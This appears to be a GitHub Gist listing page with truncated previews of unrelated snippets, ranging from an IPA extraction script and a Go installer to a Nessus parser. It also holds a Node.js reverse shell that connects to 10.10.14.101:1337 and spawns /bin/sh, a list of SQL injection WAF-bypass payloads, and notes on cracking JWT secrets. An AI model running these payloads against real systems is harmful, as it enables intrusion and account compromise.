Skip to content

Instantly share code, notes, and snippets.

@oszo
oszo / extract-ipa.sh
Created March 10, 2019 08:17
IPA extract script
if [ ! -z "$1" -a "$1" != " " ]
then
EXTRACT_APP_PATH=$1
# echo $EXTRACT_APP_PATH
if [ -d "$EXTRACT_APP_PATH" ]
then
EXTRACT_APP_NAME="$(ls $1/ | grep .app)"
# echo $EXTRACT_APP_NAME
if [ ! -z "$EXTRACT_APP_NAME" -a "$EXTRACT_APP_NAME" != " " ]
then
echo 'Installing go...'
wget https://dl.google.com/go/go1.11.5.linux-armv6l.tar.gz
sudo tar -C /usr/local -xzf go1.11.5.linux-armv6l.tar.gz
rm go1.11.5.linux-armv6l.tar.gz
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
echo 'export GOROOT=/usr/local/go' >> ~/.bashrc
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc
@averagesecurityguy
averagesecurityguy / parse_nessus.go
Created November 9, 2018 02:47
Concurrently parse a Nessus file.
/*
Copyright (c) 2018, AverageSecurityGuy
# All rights reserved.
Created: 2018-11-08
Modified: 2018-11-08
Author: Stephen Haywood
Sources: http://blog.davidsingleton.org/parsing-huge-xml-files-with-go/
*/
#!/usr/bin/env python3
from __future__ import print_function
import frida
import sys
import json
import time
def on_message(message, payload):
if(message['type'] == 'send'):
var net = require('net');
var spawn = require('child_process').spawn;
HOST="10.10.14.101";
PORT="1337";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
var client = new net.Socket();
client.connect(PORT, HOST, function() {
var sh = spawn('/bin/sh',[]);
@yookoala
yookoala / example.php
Last active June 16, 2019 15:25 — forked from hklcf/Screenshot via Google PageSpeed API
Screenshot via Google PageSpeed API
<?php
include_once 'getGooglePageSpeedScreenshot.php';
echo getGooglePageSpeedScreenshot($_GET['url']);
// Output: <img src="..." border="1" style="width: 80px; height: 80px" />
echo getGooglePageSpeedScreenshot($_GET['url'], [
'class' => 'thumbnail',
'style' => ['width: 80px;', 'height: 80px;']
@pich4ya
pich4ya / crack_jwt.txt
Last active June 19, 2023 16:13
Crack JWT (HMAC) with HashCat/JohnTheRipper on MacOS
Target:
{
"alg": "HS256",
"typ": "JWT"
}
{
"sub": "1234567890",
"name": "John Doe",
"iat": 1516239022
@zetc0de
zetc0de / sqli-bypass-waf.txt
Created June 26, 2018 17:52
Bypass WAF Sql Injection
[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]